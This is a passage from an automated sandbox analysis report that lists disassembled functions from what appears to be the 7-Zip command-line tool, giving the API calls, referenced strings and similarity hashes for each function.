                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,001D302B,?,?,?,?,001D3698), ref: 001D2F2C
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D2F34
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Unsupported switch postfix -stm, xrefs: 001D2EF6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                • String ID: Unsupported switch postfix -stm
                                                                                                                                                                                                                                • API String ID: 3321538808-3553869907
                                                                                                                                                                                                                                • Opcode ID: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                                                • Instruction ID: d4e9623a0201b4c9a02bbe3a243ac2b9f26cfee898723aed58e81d3e634bcb28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48F0F07670028486DB289F4AE4906ADA361E7A47D0F14C431EBAA07B11CF39D8D6CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D2AFD
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 001D2ACE
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D2AD6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                • String ID: (LP-
                                                                                                                                                                                                                                • API String ID: 3321538808-3833670221
                                                                                                                                                                                                                                • Opcode ID: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                                                • Instruction ID: c22a3fc3e854fa845de17e49b06d9e8307ab2753e86f39552016c3ffa2c2491c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F0907770024586DA249F4AE8906ADB361E7A87D4F14C026EFA907B14DB39D8D68B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$fputcfree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3819637083-0
                                                                                                                                                                                                                                • Opcode ID: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                                                                                                                                                                                                                • Instruction ID: b7452d09749a297b8f99c96ae6430582405473bb9ea93ab02ec9c5f326e5cea9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AF0F47620494091DA20DF26E955399A321BBA9BF4F089322EEBE077A4DF3CC5458700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memmove.MSVCRT ref: 00213E51
                                                                                                                                                                                                                                  • Part of subcall function 00212B60: CompareFileTime.KERNEL32(?,?,?,00000000,00213E64), ref: 00212BA5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CompareFileTimememmove
                                                                                                                                                                                                                                • String ID: alternate streams$files$streams
                                                                                                                                                                                                                                • API String ID: 1303509325-806849385
                                                                                                                                                                                                                                • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                                                • Instruction ID: 63f9541f3d706613120f28d16f7c828bc1c45a0df8a6d3632edbdaa9f06686dd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCF06252320569A2EB24EB66E505BD963A1FB65BD4FC05013AA0C07E549F38C3FACB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FormatMessageW.KERNEL32 ref: 001D6676
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 001D6698
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FormatFreeLocalMessagefreememmove
                                                                                                                                                                                                                                • String ID: Error #
                                                                                                                                                                                                                                • API String ID: 2451246624-1299485822
                                                                                                                                                                                                                                • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                                                • Instruction ID: 2a424519803eacd2d042d95f18bd9142bf089e70e549928b1d976368fb704cf0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD21663221428096CB60CF25E44579E73B1F3E5BA4F848223DAA847794EF7DC188CB10
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: UNC
                                                                                                                                                                                                                                • API String ID: 0-337201128
                                                                                                                                                                                                                                • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                                                • Instruction ID: d2e7c81d2fc501104475af3e4d37df4f3589b7144dcb94ba138f6d9c89ba96bb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04219A36340A84C7DF24CB1AE4947682364E7A8B88F159037CFAA47720EB39CC89C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00210661
                                                                                                                                                                                                                                • free.MSVCRT ref: 00210680
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                                                • String ID: ERROR:
                                                                                                                                                                                                                                • API String ID: 2276422817-977468659
                                                                                                                                                                                                                                • Opcode ID: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                                                                                                                                                                                • Instruction ID: 90506cf886ee3259035c0e0c267053ab8a3a81c7c926cf3c1c4741c027d7c761
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A118F6221164552CA24EF26ED5536E6320BBB9BE0F084626EE7F4B7A1DF3CD895C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4AA
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4F8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                                                                                • String ID: Path64
                                                                                                                                                                                                                                • API String ID: 3660427363-321863482
                                                                                                                                                                                                                                • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                                                • Instruction ID: ab5043e0715c52fe31a8daaa0d0b89b917cd3e53595b54025b9ba19da183c52f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F214F73615640C7EB14CF25E49476E77A0F798B84F60912AEB8A07B68DB3CC845CF40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Can not open encrypted archive. Wrong password?, xrefs: 00214297
                                                                                                                                                                                                                                • Can not open the file as archive, xrefs: 002142D8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                                                • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                                                                                                                                                                                • API String ID: 1795875747-2399861261
                                                                                                                                                                                                                                • Opcode ID: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                                                                                                                • Instruction ID: 51f67e68c051f9a066f638131bc13704f56e0ced2e76962f766d9b1505d4867c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51018F62320655A2EE14EF66E9503991361BB68BD4F549033EE1E47344DF3DC4E4C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: wcscmp
                                                                                                                                                                                                                                • String ID: \??\
                                                                                                                                                                                                                                • API String ID: 3392835482-3047946824
                                                                                                                                                                                                                                • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                                                • Instruction ID: 1e42e51fe36c9f8a8c518ea0c1f4449776d76d9029c07ec26327873f5c15a705
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22F0906220058496CE44DB2ADBE036C2321FBA4B95F905433CB6A47B15CF20C4FBC310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212011
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputcfputs
                                                                                                                                                                                                                                • String ID: Scan$Scanning
                                                                                                                                                                                                                                • API String ID: 269475090-1436252306
                                                                                                                                                                                                                                • Opcode ID: ffb3ed3a4ca004d2504b304dc7fbd21c8946e14a3d26513a036a6eb6b827f317
                                                                                                                                                                                                                                • Instruction ID: 33bf5a969b72d81a590441be3d2370b75eafe0eb4a30943d79426c637be99d5b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffb3ed3a4ca004d2504b304dc7fbd21c8946e14a3d26513a036a6eb6b827f317
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F05462715581A1DF15EF34C9493A82361E778B88F588526DB1D4B265DF3CC9EAC310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocExceptionStringThrow
                                                                                                                                                                                                                                • String ID: out of memory
                                                                                                                                                                                                                                • API String ID: 3773818493-2599737071
                                                                                                                                                                                                                                • Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                                                • Instruction ID: 614e546276bf97a74a4640d30215af2547b111332f8ca81890a8fc208283f005
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F01C62601B8592DB04DB15EA8975C6374EF99784F948025DB5807B24EBB9C8A9C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021B7E4
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputcfputs
                                                                                                                                                                                                                                • String ID: Scan $Scanning the drive:
                                                                                                                                                                                                                                • API String ID: 269475090-1085461122
                                                                                                                                                                                                                                • Opcode ID: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                                                                                                                                                                                • Instruction ID: bc9eac9d222acf9f430d03ec212fee37d8b57852ec94252e8e73f9ea7e74d185
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CE0866531598291CE01DF29DB493AC5335AB68BE5F945422DE2D47764EF28C9DAC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FECEE
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FECF6
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FEFE3
                                                                                                                                                                                                                                • free.MSVCRT ref: 001FEFEB
                                                                                                                                                                                                                                  • Part of subcall function 001D4D78: free.MSVCRT ref: 001D4DBC
                                                                                                                                                                                                                                  • Part of subcall function 001D4D78: free.MSVCRT ref: 001D4DC4
                                                                                                                                                                                                                                  • Part of subcall function 001D4D78: free.MSVCRT ref: 001D4EAC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                                                • Instruction ID: 929d2bbfa02ca1628895d8060da437e2438b8a5c1ba2d979f860c033f0cf8ba6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08A1DE32304B8996CB24DF26E0843BE77A1FB94B80F458126EF9E477A5EB79C855C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                                                • Instruction ID: 4abf024898a820ca5bf091d25d833c10c586e9768c88b832581a742afa63279f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F841A833204E8096CB20EF26E49106EBB73F795FE4B544213EB5A27B69DB74C856CB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
